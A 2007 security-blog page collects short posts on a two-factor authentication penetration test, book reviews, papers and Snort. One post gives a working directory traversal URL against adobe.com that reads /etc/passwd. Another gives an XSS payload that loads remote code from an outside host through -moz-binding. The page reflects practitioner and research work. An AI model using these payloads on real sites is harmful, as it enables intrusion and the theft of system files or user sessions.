Sunday, 30 September 2007

2 Factor Authentication Last Update

I think I am more or less done with my scope of work. There is simply no chance in hell that I can break that application. It's like no matter what I entered, I always get a "service not available" or "please try again later". Verified all the injection points and the stuff that I can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escapes all output characters. Lastly, every error...

Have you downloaded your scancode?

I was reading Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically, in the article he teaches the audience everything from dependency determination to mitigation and countermeasures for a web application. On top of it, he included a tool he coded himself called "scancode", which is used to scan source code for potential entry points for XSS and SQLi. This is a must read for those who want to know more about the source code reviewing process and methodology. Download scancode at...

Saturday, 29 September 2007

Adobe Directory Traversal???????

The other night Christ1an showed me a link on Adobe.com with directory traversal. It was an old exploit; however, it works on Adobe. This showed how Adobe is not taking application security seriously. Well, I managed to see the entire /etc/passwd file and DAMN!! I did not take a screenshot of it. I was too careless and excited to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well, check out the exploit here that was used against Adobe: http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd Add...

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as HashMaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing; however, I am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hash string into the form, and the program will fetch the hashing algorithm used. This is rather useful, because once you know the hashing algorithm, you can then use cracking software to crack for...

Three Prereviews

I am fairly excited by several new books which arrived at my door last week. The first is Security Data Visualization by Greg Conti. I was pleased to see a book on visualization, but also a book on visualization in color! I expect to learn quite a bit from this book and hope to apply some of the lessons to my own work. The next book is End-to-End Network Security: Defense-in-Depth by Omar Santos. This book seems like a Cisco-centric approach to defending a network, but I decided to take a look when I noticed sections on forensics, visibility,...

Friday, 28 September 2007

Cyberinsurance in IT Security Management

One more thought before I retire this evening. I really enjoyed reading Cyberinsurance in IT Security Management by Walter S. Baer and Andrew Parkinson. Here are my favorite excerpts: IT security has traditionally referred to technical protective measures such as firewalls, authentication systems, and antivirus software to counter such attacks, and mitigation measures such as backup hardware and software systems to reduce losses should a security...

Security Staff as Ultimate Insurance

I'm continuing to cite the Fifth Annual Global State of Information Security: Speaking of striking back, the 2007 security survey shows a remarkable (some might say troubling) trend. The IT department wants to control security again. In the first year of collaboration on this survey, CIO, CSO and PWC noted that the more confident a company was in its security, the less likely that company's security group reported to IT. Those companies also spent more...

Visibility, Visibility, Visibility

CIO Magazine's Fifth Annual Global State of Information Security features an image of a happy, tie-wearing corporate security person laying bricks to make a wall, while a dark-clad intruder with a crowbar violates the laws of physics by lifting up another section of the wall like it was made of fabric. That's a very apt reference to Soccer Goal Security, and I plan to discuss security physics in a future post. Right now I'd like to feature a few...

Excerpts from Ross Anderson / Tyler Moore Paper

I got a chance to read a new paper by one of my three wise men (Ross Anderson) and his colleague (Tyler Moore): Information Security Economics - and Beyond. The following are my favorite sections. Over the last few years, people have realised that security failure is caused by bad incentives at least as often as by bad design. Systems are particularly prone to failure when the person guarding them does not suffer the full cost of failure... [R]isks...

Microsoft's Anemone Project

While flying to Los Angeles this week I read a great paper by Microsoft and Michigan researchers: Reclaiming Network-wide Visibility Using Ubiquitous Endsystem Monitors. From the Abstract: Network-centric tools like NetFlow and security systems like IDSes provide essential data about the availability, reliability, and security of network devices and applications. However, the increased use of encryption and tunnelling has reduced the visibility of...

Be the Caveman

I just read a great story by InformationWeek's Sharon Gaudin titled Interview With A Convicted Hacker: Robert Moore Tells How He Broke Into Routers And Stole VoIP Services: Convicted hacker Robert Moore, who is set to go to federal prison this week, says breaking into 15 telecommunications companies and hundreds of businesses worldwide was incredibly easy because simple IT mistakes left gaping technical holes. Moore, 23, of Spokane, Wash., pleaded...

Snort Report 9 Posted

My 9th Snort Report on Snort's Stream5 and TCP overlapping fragments is now available online. From the start of the article: It's important for value-added resellers and consultants to understand how Snort detects security events. Stream5 is a critical aspect of the inspection and detection equation. A powerful Snort preprocessor, Stream5 addresses several aspects of network-centric traffic inspection. Sourcefire calls Stream5 a "target-based" system,...

Can Your Machine Be Hacked?

Last night, I received an email from Rich McIver and he gave me a link to publish. Basically, in his post, he provides users with ideas on how to secure holes in your PC. There are 12 tests, all of which give a rough idea of how to secure your machine. Well, I would say it is a good start for those who want to start learning about security overall. Check it out: http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/ The Hacka ...

Thursday, 27 September 2007

Blueinfy.com

Want to know more about Web 2.0 hacking? Want free Web 2.0 auditing tools and articles? Want to know more about web security and hacking? You will have to check out Blueinfy.com; it is definitely a site worth visiting, with great in-depth articles and simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj Shah, an ex-employee of Foundstone USA. Google him and you will know how powerful he is :) The Hacka ...

XSS on a vendor's website

I am still testing the application for flaws. However, it is so secure that I can't do a single thing. In the end, I ended up testing a vendor's site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when I viewed the source code. I was dejected, as I knew there was something more I could do. A few minutes later, .mario was online and I told him about my problem. Immediately, he came up with a trick that allows XSS to happen. So in the end, I entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)"...

Tuesday, 25 September 2007

DHS Debacle

Thanks to the Threat Level story FBI Investigates DHS Contractor for Failing to Protect Gov't Computer I learned of the Washington Post story Contractor Blamed in DHS Data Breaches: The FBI is investigating a major information technology firm with a $1.7 billion Department of Homeland Security contract after it allegedly failed to detect cyber break-ins traced to a Chinese-language Web site and then tried to cover up its deficiencies, according to...

2 Factor Authentication Update

I don't believe this, I basically can't do a SQL injection, CSRF or XSS! Everything I wanted to do is basically either encrypted, or if I inject a simple character like ", it says service unavailable. This application can be considered very secure in terms of encryption and of a good standard if weighing it against the OWASP top ten. Even if I enter a value like 10, this value will be encrypted with this: Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tUI...

Monday, 24 September 2007

2 Factor Authentication Day 2

Damn, it's getting tough! Have you guys seen a 6 digit password with an encrypted string this long? ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120 Well, there is nothing more I can do? I dunno, still thinking: ????? The Hacka ...

2 Factor Authentication?

Well, if you guys asked me why I haven't been updating my blog, I can only say that there is so much to be done at work, and of course reading a lot on Rsnake's XSS exploits and defence. I've been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions. Well, back to the main topic: I had been assigned to hack an application with 2 factor authentication. Damn, all I can say is it is very secure...

Saturday, 22 September 2007

Review of Snort IDS and IPS Toolkit and One Prereview

Amazon.com just posted my three star review of Snort IDS and IPS Toolkit. From the review: Syngress published "Snort 2.0" in Mar 03, and I gave it a four star review in Jul 03. Syngress followed with "Snort 2.1" in May 04, and I gave it a four star review in Jul 04. I recommend reading those reviews, since the latest edition -- "Snort IDS and IPS Toolkit" (SIAIT) -- makes many of the same mistakes as its predecessors. Worse, it includes material...

Friday, 21 September 2007

Pescatore on Security Trends

The article Spend less on IT security, says Gartner caught my attention. Comments are inline, and my apologies if Mr. Pescatore was misquoted. Organisations should aim to spend less of their IT budgets on security, Gartner vice-president John Pescatore told the analyst firm’s London IT Security Summit on 17 September. In a keynote speech, he said that retailers typically spend 1.5% of revenue trying to prevent crime, then still lose a further 1.5% through shoplifting and staff theft, costing 3% in total. Digital security is not comparable to shoplifting....

Tactical Network Security Monitoring Platform

I am working on both strategic and tactical network security monitoring projects. On the tactical side I have been looking for a platform that I could carry on a plane and fit in the overhead compartment, or at the very least under the seat in front of me. Earlier in my career I've used Shuttle and Hacom boxes, but I'm always looking for something better. People often ask "Why don't you use a laptop?" Reasons to not use a laptop include: Laptops don't...

Security Jersey Colors

I realized after my previous post that not everyone may be familiar with the "color" system used to designate various military security teams. I referenced a "red team" in my post NSA IAM and IEM Summary, for example. I thought it might be helpful to post my understanding of these colors and to solicit feedback from anyone who could clarify these statements. Red Team: A Red Team is an adversary simulation team. The Red Team attacks the asset to...

Tactical Traffic Assessment

When I wrote Extrusion Detection in 2004-5 I used the term Traffic Threat Assessment to describe a means of inspecting network traffic for signs of malicious activity. I differentiated among various assessments using this terminology. A vulnerability assessment identifies vulnerabilities and exposures in assets. A penetration test identifies at least one way that an adversary could exploit vulnerabilities and exposures to compromise a target or satisfy a related objective. A traffic threat assessment identifies traffic that indicates a network has...

Wisdom from Ranum

The Face-Off article in the September 2007 Information Security Magazine contains a great closing thought by Marcus Ranum: Will the future be more secure? It'll be just as insecure as it possibly can, while still continuing to function. Just like it is today. "Continuing to function" is an interesting concept. The reason the "Internet" hasn't been destroyed by terrorists, organized crime, or others is that doing so would cut off a major communication...

Thursday, 20 September 2007

TFTPgrab

While I was teaching and speaking at conferences, I usually discussed research and coding projects with audience members. One of my requests involved writing a tool to reconstruct TFTP sessions. Because TFTP uses UDP, files transferred using TFTP cannot be rebuilt using Wireshark, TCPFlow, and similar tools. I was unaware of any tool that could rebuild TFTP transfers, despite the obvious benefit of being able to do so. Today I was very surprised...

Radiation Detection Mirrors Intrusion Detection

Yesterday I heard part of the NPR story Auditors, DHS Disagree on Radiation Detectors. I found two Internet sources, namely DHS fudged test results, watchdog agency says and DHS 'Dry Run' Support Cited, and I looked at COMBATING NUCLEAR SMUGGLING: Additional Actions Needed to Ensure Adequate Testing of Next Generation Radiation Detection Equipment (.pdf), a GAO report. The report begins by explaining why it was written: The Department of Homeland Security’s...

Monday, 17 September 2007

The Academic Trap

I really enjoyed Anton's post Once More on Failure of Academic Research in Security where he cites Ian Grigg's The Failure of the Academic Contribution to Security Science: [A]cademics have presented stuff that is sometimes interesting but rarely valuable. They've pretty much ignored all the work that was done beforehand, and they've consequently missed the big picture. Why is this? One reason is above: academic work is only serious if it quotes other...

Anton Chuvakin's Age of Compliance Reports

I didn't pay close enough attention when Anton Chuvakin first mentioned this series of articles he's writing. His "Age of Compliance" series addresses various operational security issues and then describes how certain legal frameworks (Federal Information Security Management Act, Payment Card Industry Data Security Standard, Health Insurance Portability and Accountability Act, etc.) influence those activities. Thus far Anton has published: Incident...